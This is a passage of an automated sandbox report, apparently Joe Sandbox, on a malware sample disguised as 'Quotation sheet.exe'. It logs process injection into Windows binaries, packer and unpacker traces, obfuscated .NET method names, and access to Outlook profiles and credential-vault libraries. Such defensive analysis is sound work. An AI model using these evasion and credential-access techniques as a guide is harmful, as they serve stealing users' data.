                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: winsqlite3.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Program Files (x86)\HBtiZeenUDNvQLIHkokEVKaZKbScrgeDEyFLIsJrtGkANUbLpzVjfgmHGKsNy\UsMxwwTDRUHSSD.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Quotation sheet.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\pcaui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                      Source: Quotation sheet.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Quotation sheet.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Quotation sheet.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: pcaui.exe, 00000009.00000002.3972944908.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.000000000575C000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.0000000002B9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2755311109.000000000C8FC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: pcaui.pdb source: vbc.exe, 00000007.00000002.2440631614.0000000005058000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000002.3972118198.000000000133B000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000003.2379322362.000000000131B000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdb source: Quotation sheet.exe
                      Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: UsMxwwTDRUHSSD.exe, 00000008.00000000.2362478081.000000000091E000.00000002.00000001.01000000.0000000C.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3971822631.000000000091E000.00000002.00000001.01000000.0000000C.sdmp
                      Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2456107078.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2453790948.0000000004C38000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: BCYJ.pdbSHA256 source: Quotation sheet.exe
                      Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000007.00000002.2440941121.0000000005300000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, pcaui.exe, 00000009.00000003.2456107078.0000000004DEA000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.000000000512E000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3973323200.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000009.00000003.2453790948.0000000004C38000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: vbc.pdb source: pcaui.exe, 00000009.00000002.3972944908.0000000004C39000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000009.00000002.3974069413.000000000575C000.00000004.10000000.00040000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 0000000B.00000002.3973387161.0000000002B9C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000D.00000002.2755311109.000000000C8FC000.00000004.80000000.00040000.00000000.sdmp
                      Source: Binary string: pcaui.pdbGCTL source: vbc.exe, 00000007.00000002.2440631614.0000000005058000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000002.3972118198.000000000133B000.00000004.00000020.00020000.00000000.sdmp, UsMxwwTDRUHSSD.exe, 00000008.00000003.2379322362.000000000131B000.00000004.00000020.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      .NET source code contains method to dynamically call methods (often used by packers)
                      Source: 0.2.Quotation sheet.exe.5c50000.4.raw.unpack, id.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      .NET source code contains potential unpacker
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, z2xNW56F1ZH2jZTKon.cs.Net Code: C9lfi6UOWB System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, z2xNW56F1ZH2jZTKon.cs.Net Code: C9lfi6UOWB System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\Quotation sheet.exeCode function: 0_2_059D939C pushfd ; retf 0_2_059DA921
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004030C0 push eax; ret 7_2_004030C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0040D0E4 push edx; retf 7_2_0040D0E5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0040808C push esp; ret 7_2_00408097
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00417257 push 00000020h; iretd 7_2_00417259
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00417260 pushad ; retf 7_2_0041726B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00417A64 push ecx; ret 7_2_00417A78
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041EA38 push eax; retf 7_2_0041EA4B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_004172D4 pushad ; retf 7_2_0041726B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0041EA8D push esp; retf 7_2_0041EA8E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_00416797 push ds; iretd 7_2_004167A2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053027FA pushad ; ret 7_2_053027F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0530225F pushad ; ret 7_2_053027F9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_053309AD push ecx; mov dword ptr [esp], ecx7_2_053309B6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0530283D push eax; iretd 7_2_05302858
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 7_2_0530135D push eax; iretd 7_2_05301369
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04F927FA pushad ; ret 9_2_04F927F9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04F9225F pushad ; ret 9_2_04F927F9
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04F9283D push eax; iretd 9_2_04F92858
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04FC09AD push ecx; mov dword ptr [esp], ecx9_2_04FC09B6
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_04F91368 push eax; iretd 9_2_04F91369
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D74211 pushad ; retf 9_2_02D741A8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D74194 push 00000020h; iretd 9_2_02D74196
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D7419D pushad ; retf 9_2_02D741A8
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D749A1 push ecx; ret 9_2_02D749B5
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D80E8D push FFFFFFD3h; iretd 9_2_02D80E98
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D74E20 push 5390E75Dh; retn 7F36h9_2_02D74ECF
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D64FC9 push esp; ret 9_2_02D64FD4
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D736D4 push ds; iretd 9_2_02D736DF
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D77872 push ds; iretd 9_2_02D7788C
                      Source: C:\Windows\SysWOW64\pcaui.exeCode function: 9_2_02D7B9CA push esp; retf 9_2_02D7B9CB
                      Source: Quotation sheet.exeStatic PE information: section name: .text entropy: 7.730235064385923
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, XsIscADSqAfOW73RNQ.csHigh entropy of concatenated method names: 'Dt8A5uVl4l', 'jbgAs7D1dn', 'J7vAw9lZJY', 'DZnADmKfeu', 'uiGAhSquZI', 'bJPAkPwlZ3', 'hJbAx651t2', 't4JAbLamQ3', 'sWlAmedQI3', 'cl2AEoAQhL'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, cnsSNVMCUYZhqpICBr.csHigh entropy of concatenated method names: 'TFYu7lfLoe', 'nZ5u16xR1V', 'ryuAByNWjA', 'QeKAyjlCIn', 'rgWArNvIMW', 'kKPA4Jd4BN', 'PChALmgcDx', 'cyJAl4I0Bm', 'a6dAoTRyP2', 'xmFASGlbE0'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, dxnwfWo1hwohEfxBel.csHigh entropy of concatenated method names: 'KDBg9b54HI', 'VBSg3spwXi', 'twCgij0Hrt', 'qang5Gg6II', 'Qo3g7NAj93', 'FyKgsHpReh', 'oEYg1FI7pT', 'vFAgw7E7gq', 'll6gDoWYx3', 'jlogMNYsfm'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, l4AVtveKkOdZVCL4LB.csHigh entropy of concatenated method names: 'CDWPviF0Za', 'Uo3PVyXg6D', 'vtEPubsanL', 'zs3PgL1aXP', 'YfIP6MONkG', 'GkMuQT78fb', 'RKBuCswdjA', 'N1cuWxgn98', 'LRcunACgDZ', 'LeCutm3ym6'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, sp1lDdRRnrqqK3bpA0V.csHigh entropy of concatenated method names: 'mnUETFyasX', 'Rh1EzLqPad', 'z6EcUqqHYX', 'fnhcRlSp3j', 'xmOcFMJpx2', 'GtMcakhZhM', 'woWcfc48Zx', 'gBucvObXUN', 'v53cJHAONC', 'duWcVAVU97'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, z2xNW56F1ZH2jZTKon.csHigh entropy of concatenated method names: 'HWiav0ykQt', 'IQBaJtCWNU', 'B4aaVYBBUg', 'pS3aAxip2W', 'MUuau5jyuH', 'U7QaPXxLM3', 'N9OagA60dH', 'RSOa6kWaCV', 'BpKaKNPROS', 'jVHaXpArOq'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, qvsr92fm6GDDkDm7X7.csHigh entropy of concatenated method names: 'duIRgPUKR5', 'vS9R6CW8ki', 'gSqRXAfOW7', 'yRNRqQansS', 'HICRhBrX4A', 'gtvRkKkOdZ', 'SgqAF8reetDQ1fXeH7', 'Ely01JmLid1cbMACtS', 'oQeRRKB4yY', 'tgORa5uN9L'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, i79tYwzmrScsCg7BCX.csHigh entropy of concatenated method names: 'k59Esu4n50', 'gDCEwwgGxe', 'vTbEDbUTSk', 'P4NEe5B8WX', 'OwlEpcU54u', 'IPAEyFKNde', 'aQAErGJRF7', 'XGhE2chMDl', 'fbsE95uab2', 'JIrE3YCuXt'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, xFXs66RfPcaMhhhXaWe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wPGjmxuxKX', 'sQljEkoC5C', 'yBNjctBFj7', 'RYgjjiJwbP', 'YFXjZCg7BN', 'WiHjYOl8se', 'W7pj2QXXWT'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, PPUKR5wZS9CW8kiXFb.csHigh entropy of concatenated method names: 'cokVduJeCG', 'gIZVGruRCO', 'xmRVNV2uUh', 'm1tV8hush9', 'rK8VQc1yO5', 'LoHVCCnjyt', 'zyoVW1YWhv', 'OULVnKmpWN', 'eV5Vt2eP1l', 'sHBVT2yaJA'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, j6G0lPT5d0C3ab4ktI.csHigh entropy of concatenated method names: 'gjMEADBY0U', 'i39Euv0iNI', 'PSbEPDrBk9', 'f7REgOmqFt', 'ICOEmKl1oF', 'IiIE6kKmjC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, A2t7lBLdUoLTXrFHYD.csHigh entropy of concatenated method names: 'bjLgJbJUtv', 'U08gA0DFNA', 'HQ6gPr5YYi', 'GXJPTXSZHg', 'hGZPzIdvtD', 'ysbgUTpR3v', 'gddgR9t625', 'npmgFdJNGj', 'KY6gaKDCwT', 'FwRgfp4j1E'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, MlTvVWW80oPgjXVCSK.csHigh entropy of concatenated method names: 'ORamhTO2cT', 'T2kmx32LDw', 'xJwmmtT2Cu', 'wQfmchxIsq', 'mkFmZB5PS6', 'an8m2WKWE0', 'Dispose', 'tOBbJEMW28', 'ULubVsuQ5X', 'UnVbA7Ki3Z'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, BEm3b2t8ZooiFqvwgO.csHigh entropy of concatenated method names: 'OOtmeiktap', 'yK8mpxTyY8', 'ABYmBNiMah', 'niDmygUZU3', 'FF7mraZn7T', 'gixm43yOlo', 'Sc0mL4SAM6', 'RtPmlEMse9', 'wXtmomreJv', 'QSBmSXaURY'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, mmaSdf0UJqIPKo4hqT.csHigh entropy of concatenated method names: 'vNZHwRO4Y3', 'YN3HDuEn8j', 'RdDHetv0SI', 'I1MHpJUurH', 'UeXHy6Cjqv', 'AQOHrT5iI9', 'NsoHLG55Qk', 'Jv6Hl9UGl7', 'QhbHS5FCob', 'AsrHOr01lS'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, GwuH3CdsRsmh9OqFE9.csHigh entropy of concatenated method names: 'zY5hSs9GTA', 'gmkhInbkoD', 'YnMhd7Q8AK', 'YCshGW7hmD', 'rgAhpEgiXF', 'rRthBi13e6', 'AXGhySQsuU', 'lAehrBLlix', 'nnZh4HVY4K', 'UvbhLZrHr1'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, F1lwPVF41FEZb53qRh.csHigh entropy of concatenated method names: 'gjaiJiYCI', 'bhM5yH5GC', 'efls7PTBx', 'Ux11wvg9X', 'AJ2DCqT1b', 'e6KM1lhlD', 'nBf4eNcQRHG65Q7r6H', 'Wk4oaTCRf3AZFxj6DR', 'SE8bHGOU4', 'FvfEQHEb5'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, e9rxZJNgVmTvgJYWCE.csHigh entropy of concatenated method names: 'ToString', 'pnNkOvAdcq', 'nDfkpT6tbP', 'zYFkB7o5f9', 'y6oky89n6b', 'X63krD2inm', 'umyk48S7y4', 'K0AkLRTDqQ', 'EQQklOgqfB', 'd1Rko4VIPE'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, uSDqqFVdXg1Ch03CNt.csHigh entropy of concatenated method names: 'Dispose', 'MPgRtjXVCS', 'dCJFpSqoYl', 'P2ocKLlTVu', 'l3XRThK2FA', 'SDxRzfQSh2', 'ProcessDialogKey', 'wQ7FUEm3b2', 'TZoFRoiFqv', 'DgOFFg6G0l'
                      Source: 0.2.Quotation sheet.exe.445e968.3.raw.unpack, CIDwwdCastJyY1nYgh.csHigh entropy of concatenated method names: 'iaKxn0RRT3', 'OCSxTwFcfG', 'WwObUYuwdP', 'RkxbRsbIpm', 'I3ExO4IK0p', 'NB3xIKrSvv', 'Dvvx0cZsGa', 'PZ6xd33Dvb', 'vfhxGcpvRR', 'iKIxNnIBfd'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, XsIscADSqAfOW73RNQ.csHigh entropy of concatenated method names: 'Dt8A5uVl4l', 'jbgAs7D1dn', 'J7vAw9lZJY', 'DZnADmKfeu', 'uiGAhSquZI', 'bJPAkPwlZ3', 'hJbAx651t2', 't4JAbLamQ3', 'sWlAmedQI3', 'cl2AEoAQhL'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, cnsSNVMCUYZhqpICBr.csHigh entropy of concatenated method names: 'TFYu7lfLoe', 'nZ5u16xR1V', 'ryuAByNWjA', 'QeKAyjlCIn', 'rgWArNvIMW', 'kKPA4Jd4BN', 'PChALmgcDx', 'cyJAl4I0Bm', 'a6dAoTRyP2', 'xmFASGlbE0'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, dxnwfWo1hwohEfxBel.csHigh entropy of concatenated method names: 'KDBg9b54HI', 'VBSg3spwXi', 'twCgij0Hrt', 'qang5Gg6II', 'Qo3g7NAj93', 'FyKgsHpReh', 'oEYg1FI7pT', 'vFAgw7E7gq', 'll6gDoWYx3', 'jlogMNYsfm'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, l4AVtveKkOdZVCL4LB.csHigh entropy of concatenated method names: 'CDWPviF0Za', 'Uo3PVyXg6D', 'vtEPubsanL', 'zs3PgL1aXP', 'YfIP6MONkG', 'GkMuQT78fb', 'RKBuCswdjA', 'N1cuWxgn98', 'LRcunACgDZ', 'LeCutm3ym6'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, sp1lDdRRnrqqK3bpA0V.csHigh entropy of concatenated method names: 'mnUETFyasX', 'Rh1EzLqPad', 'z6EcUqqHYX', 'fnhcRlSp3j', 'xmOcFMJpx2', 'GtMcakhZhM', 'woWcfc48Zx', 'gBucvObXUN', 'v53cJHAONC', 'duWcVAVU97'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, z2xNW56F1ZH2jZTKon.csHigh entropy of concatenated method names: 'HWiav0ykQt', 'IQBaJtCWNU', 'B4aaVYBBUg', 'pS3aAxip2W', 'MUuau5jyuH', 'U7QaPXxLM3', 'N9OagA60dH', 'RSOa6kWaCV', 'BpKaKNPROS', 'jVHaXpArOq'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, qvsr92fm6GDDkDm7X7.csHigh entropy of concatenated method names: 'duIRgPUKR5', 'vS9R6CW8ki', 'gSqRXAfOW7', 'yRNRqQansS', 'HICRhBrX4A', 'gtvRkKkOdZ', 'SgqAF8reetDQ1fXeH7', 'Ely01JmLid1cbMACtS', 'oQeRRKB4yY', 'tgORa5uN9L'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, i79tYwzmrScsCg7BCX.csHigh entropy of concatenated method names: 'k59Esu4n50', 'gDCEwwgGxe', 'vTbEDbUTSk', 'P4NEe5B8WX', 'OwlEpcU54u', 'IPAEyFKNde', 'aQAErGJRF7', 'XGhE2chMDl', 'fbsE95uab2', 'JIrE3YCuXt'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, xFXs66RfPcaMhhhXaWe.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'wPGjmxuxKX', 'sQljEkoC5C', 'yBNjctBFj7', 'RYgjjiJwbP', 'YFXjZCg7BN', 'WiHjYOl8se', 'W7pj2QXXWT'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, PPUKR5wZS9CW8kiXFb.csHigh entropy of concatenated method names: 'cokVduJeCG', 'gIZVGruRCO', 'xmRVNV2uUh', 'm1tV8hush9', 'rK8VQc1yO5', 'LoHVCCnjyt', 'zyoVW1YWhv', 'OULVnKmpWN', 'eV5Vt2eP1l', 'sHBVT2yaJA'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, j6G0lPT5d0C3ab4ktI.csHigh entropy of concatenated method names: 'gjMEADBY0U', 'i39Euv0iNI', 'PSbEPDrBk9', 'f7REgOmqFt', 'ICOEmKl1oF', 'IiIE6kKmjC', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, A2t7lBLdUoLTXrFHYD.csHigh entropy of concatenated method names: 'bjLgJbJUtv', 'U08gA0DFNA', 'HQ6gPr5YYi', 'GXJPTXSZHg', 'hGZPzIdvtD', 'ysbgUTpR3v', 'gddgR9t625', 'npmgFdJNGj', 'KY6gaKDCwT', 'FwRgfp4j1E'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, MlTvVWW80oPgjXVCSK.csHigh entropy of concatenated method names: 'ORamhTO2cT', 'T2kmx32LDw', 'xJwmmtT2Cu', 'wQfmchxIsq', 'mkFmZB5PS6', 'an8m2WKWE0', 'Dispose', 'tOBbJEMW28', 'ULubVsuQ5X', 'UnVbA7Ki3Z'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, BEm3b2t8ZooiFqvwgO.csHigh entropy of concatenated method names: 'OOtmeiktap', 'yK8mpxTyY8', 'ABYmBNiMah', 'niDmygUZU3', 'FF7mraZn7T', 'gixm43yOlo', 'Sc0mL4SAM6', 'RtPmlEMse9', 'wXtmomreJv', 'QSBmSXaURY'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, mmaSdf0UJqIPKo4hqT.csHigh entropy of concatenated method names: 'vNZHwRO4Y3', 'YN3HDuEn8j', 'RdDHetv0SI', 'I1MHpJUurH', 'UeXHy6Cjqv', 'AQOHrT5iI9', 'NsoHLG55Qk', 'Jv6Hl9UGl7', 'QhbHS5FCob', 'AsrHOr01lS'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, GwuH3CdsRsmh9OqFE9.csHigh entropy of concatenated method names: 'zY5hSs9GTA', 'gmkhInbkoD', 'YnMhd7Q8AK', 'YCshGW7hmD', 'rgAhpEgiXF', 'rRthBi13e6', 'AXGhySQsuU', 'lAehrBLlix', 'nnZh4HVY4K', 'UvbhLZrHr1'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, F1lwPVF41FEZb53qRh.csHigh entropy of concatenated method names: 'gjaiJiYCI', 'bhM5yH5GC', 'efls7PTBx', 'Ux11wvg9X', 'AJ2DCqT1b', 'e6KM1lhlD', 'nBf4eNcQRHG65Q7r6H', 'Wk4oaTCRf3AZFxj6DR', 'SE8bHGOU4', 'FvfEQHEb5'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, e9rxZJNgVmTvgJYWCE.csHigh entropy of concatenated method names: 'ToString', 'pnNkOvAdcq', 'nDfkpT6tbP', 'zYFkB7o5f9', 'y6oky89n6b', 'X63krD2inm', 'umyk48S7y4', 'K0AkLRTDqQ', 'EQQklOgqfB', 'd1Rko4VIPE'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, uSDqqFVdXg1Ch03CNt.csHigh entropy of concatenated method names: 'Dispose', 'MPgRtjXVCS', 'dCJFpSqoYl', 'P2ocKLlTVu', 'l3XRThK2FA', 'SDxRzfQSh2', 'ProcessDialogKey', 'wQ7FUEm3b2', 'TZoFRoiFqv', 'DgOFFg6G0l'
                      Source: 0.2.Quotation sheet.exe.7b80000.5.raw.unpack, CIDwwdCastJyY1nYgh.csHigh entropy of concatenated method names: 'iaKxn0RRT3', 'OCSxTwFcfG', 'WwObUYuwdP', 'RkxbRsbIpm', 'I3ExO4IK0p', 'NB3xIKrSvv', 'Dvvx0cZsGa', 'PZ6xd33Dvb', 'vfhxGcpvRR', 'iKIxNnIBfd'

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Quotation sheet.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
